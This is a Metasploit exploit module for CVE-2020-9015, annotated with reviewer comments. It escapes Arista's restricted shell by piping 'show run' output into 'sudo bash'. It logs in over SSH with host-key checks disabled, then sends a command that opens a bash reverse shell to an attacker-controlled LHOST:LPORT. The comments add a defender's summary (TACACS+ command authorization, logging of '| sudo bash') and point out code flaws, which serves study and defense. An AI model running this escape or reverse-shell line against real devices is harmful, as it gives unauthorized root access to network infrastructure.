Arista Restricted Shell Escape / Privilege Escalation Exploit
Security Risk Critical
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'net/ssh'
require 'net/ssh/command_stream'

# Exploit module for CVE-2020-9015 (Arista restricted-shell escape with privesc).
#
# Flow as implemented below: password-authenticate over SSH, open a channel
# with a PTY and a shell, wait for received output containing '#', then send
# one CLI line that pipes `show run` output into `sudo bash`, which in turn
# starts a bash reverse shell towards LHOST:LPORT.
#
# Defender's summary: the escape depends entirely on the device letting a
# (read-only, per the description) CLI account pipe command output into
# `sudo bash`. The description attributes this to a TACACS+ misconfiguration,
# so command authorization/accounting for CLI accounts is the control to
# review; a `| sudo bash` fragment in command-accounting logs is the concrete
# detection signal — presumably, confirm against the device's logging setup.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::SSH
  include Msf::Auxiliary::Report

  # Registers module metadata and datastore options.
  #
  # 'Payload'/'PayloadType' are declared here, but +exploit+ below never
  # calls +payload+; it builds its own bash reverse-shell string from
  # LHOST/LPORT instead, so the configured payload has no effect.
  #
  # @param info [Hash] module info merged via +update_info+
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Arista restricted shell escape (with privesc)',
        'Description' => %q{ This exploit module takes advantage of a poorly configured TACACS+ config, Arista's bash shell and TACACS+ read-only account to privilage escalate. A CVSS v3 base score of 9.8 has been assigned. },
        'License' => MSF_LICENSE,
        'Author' => ['Chris Anders'],
        'References' => [
          [ 'CVE', '2020-9015'],
          [ 'URL', 'http://www.securitybytes.me/posts/cve-2020-9015/'],
          [ 'URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9015' ],
          [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2020-9015' ],
        ],
        'Arch' => ARCH_X86,
        'ConnectionType' => 'find',
        'DefaultTarget' => 0,
        'DefaultOptions' => { 'Payload' => 'linux/x86/shell_reverse_tcp' },
        'DisclosureDate' => 'Feb 02 2020',
        'Platform' => 'linux',
        'PayloadType' => 'cmd_interact',
        'Privileged' => true,
        'Targets' => [ [ 'Universal', {} ] ]
      )
    )
    register_options(
      [
        Opt::RPORT(22),
        # Both credentials are required; the empty defaults force the operator to set them.
        OptString.new('USERNAME', [true, 'Username to login with', '']),
        OptString.new('PASSWORD', [true, 'Password to login with', '']),
      ]
    )
    register_advanced_options(
      [
        Opt::Proxies,
        OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30]),
        # NOTE(review): registered but never read anywhere in this module.
        OptBool.new('GatherProof', [true, 'Gather proof of access via pre-session shell commands', false])
      ]
    )
  end

  # Probes the target by attempting a full SSH password login.
  #
  # Every failure path (connection error, disconnect/EOF, timeout, failed
  # authentication, any other Net::SSH exception) maps to Safe; only a
  # successful login yields Detected. This is therefore a credential check,
  # not a vulnerability check: any host that accepts the password is
  # reported as Detected regardless of its CLI/TACACS+ configuration.
  #
  # NOTE(review): the Net::SSH session returned on success is never closed,
  # and server host-key verification is disabled (+verify_host_key: :never+).
  #
  # @return [CheckCode] Safe on any failure, Detected on successful login
  def check
    factory = ssh_socket_factory
    opts = {
      auth_methods: ['password', 'keyboard-interactive'],
      port: rport,
      use_agent: false,
      config: false,
      password: password,
      proxy: factory,
      non_interactive: true,
      verify_host_key: :never
    }
    begin
      # SSH_TIMEOUT bounds the whole connect+auth exchange.
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        Net::SSH.start(rhost, username, opts)
      end
    rescue Rex::ConnectionError
      return CheckCode::Safe
    rescue Net::SSH::Disconnect, ::EOFError
      return CheckCode::Safe
    rescue Timeout::Error
      return CheckCode::Safe
    rescue Net::SSH::AuthenticationFailed
      return CheckCode::Safe
    rescue Net::SSH::Exception
      return CheckCode::Safe
    end
    CheckCode::Detected
  end

  # Thin datastore accessors used by +check+ and +exploit+.
  # LHOST/LPORT are the reverse-shell listener address interpolated into
  # the command sent in +exploit+.

  # @return [String] target host from the datastore
  def rhost
    datastore['RHOST']
  end

  # @return [Integer] target SSH port from the datastore
  def rport
    datastore['RPORT']
  end

  # @return [Integer] listener port from the datastore
  def lport
    datastore['LPORT']
  end

  # @return [String] listener host from the datastore
  def lhost
    datastore['LHOST']
  end

  # @return [String] SSH username from the datastore
  def username
    datastore['USERNAME']
  end

  # @return [String] SSH password from the datastore
  def password
    datastore['PASSWORD']
  end

  # Logs in over SSH, requests a PTY and a shell, and on seeing a prompt
  # sends the single CLI line that performs the escape.
  #
  # Error handling: every SSH failure during negotiation is turned into a
  # +fail_with+ (which aborts the module); the +unless ssh+ guard after the
  # rescue chain is a second safety net for the case where +ssh+ was never
  # assigned. Inside the channel callbacks the "success" of the shell request
  # is not actually checked (see the NOTE below), and success of the escape
  # is printed without any confirmation that a shell connected back.
  #
  # @return [void]
  def exploit
    factory = ssh_socket_factory
    opts = {
      auth_methods: ['password', 'keyboard-interactive'],
      port: rport,
      use_agent: false,
      config: false,
      password: password,
      proxy: factory,
      non_interactive: true,
      # Host keys are not verified; the operator gets no MITM protection here.
      verify_host_key: :never
    }
    # SSH_DEBUG turns on Net::SSH's own debug logging.
    opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
    print_status("#{rhost}:#{rport} - Attempt to login to the Arista's restricted shell...")
    begin
      # Pre-declare so a timeout inside the block leaves +ssh+ nil rather than undefined.
      ssh = nil
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh = Net::SSH.start(rhost, username, opts)
      end
    rescue Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{rhost}:#{rport} SSH - Connection error or address in use")
    rescue Net::SSH::Disconnect, ::EOFError
      fail_with(Failure::Disconnected, "#{rhost}:#{rport} SSH - Disconnected during negotiation")
    rescue ::Timeout::Error
      fail_with(Failure::TimeoutExpired, "#{rhost}:#{rport} SSH - Timed out during negotiation")
    rescue Net::SSH::AuthenticationFailed
      fail_with(Failure::NoAccess, "#{rhost}:#{rport} SSH - Failed authentication")
    rescue Net::SSH::Exception => e
      fail_with(Failure::Unknown, "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}")
    end
    fail_with(Failure::Unknown, "#{rhost}:#{rport} SSH session couldn't be established") unless ssh
    begin
      # Closure flag: +on_data+ fires for every received chunk, so this
      # ensures the escape command is written to the channel only once.
      payload_executed = false
      print_good('SSH connection established.')
      ssh.open_channel do |channel, _data|
        print_status('Requesting pty rbash')
        channel.request_pty do |ch, success|
          fail_with(Failure::Unreachable, "#{rhost}:#{rport} Could not request a PTY!") unless success
          print_good('PTY successfully obtained.')
          print_status('Requesting a shell.')
          ch.send_channel_request('shell') do |cha, _succ|
            # NOTE(review): this tests the PTY result +success+ captured from
            # the enclosing block, not this request's own +_succ+, so a failed
            # shell request is never reported here.
            fail_with(Failure::Unreachable, "#{rhost}:#{rport} Could not open rbash shell!") unless success
            print_good('Spawned into arista rbash shell.')
            cha.on_data do |_xx, data2|
              # Prompt detection: any chunk containing '#' is taken as the
              # prompt (presumably the privileged-mode prompt — not verified
              # beyond this substring check).
              if data2.include? '#'
                if !payload_executed
                  print_status('Attempting to break out of Arista rbash...')
                  # The CLI's output pipe is the escape path: `show run` output
                  # is piped into `sudo bash`, which launches a bash reverse
                  # shell to LHOST:LPORT. The framework payload is not used.
                  channel.send_data("show run | grep '' | sudo bash -c 'bash -i >& /dev/tcp/#{lhost}/#{lport} 0>&1 2>&1 &'\n")
                  payload_executed = true
                  # Printed unconditionally; nothing here confirms the reverse
                  # shell actually connected back.
                  print_good('Escaped from rbash!')
                end
              end
            end
          end
        end
      end
      # Drive the Net::SSH event loop until the framework registers a session.
      # NOTE(review): if no session ever connects back this appears to have
      # no other exit condition — confirm against Net::SSH#loop semantics.
      ssh.loop unless session_created?
    rescue Errno::EBADF => e
      # Bad file descriptor (e.g. socket torn down under the loop) is only logged.
      elog(e.message)
    end
  end
end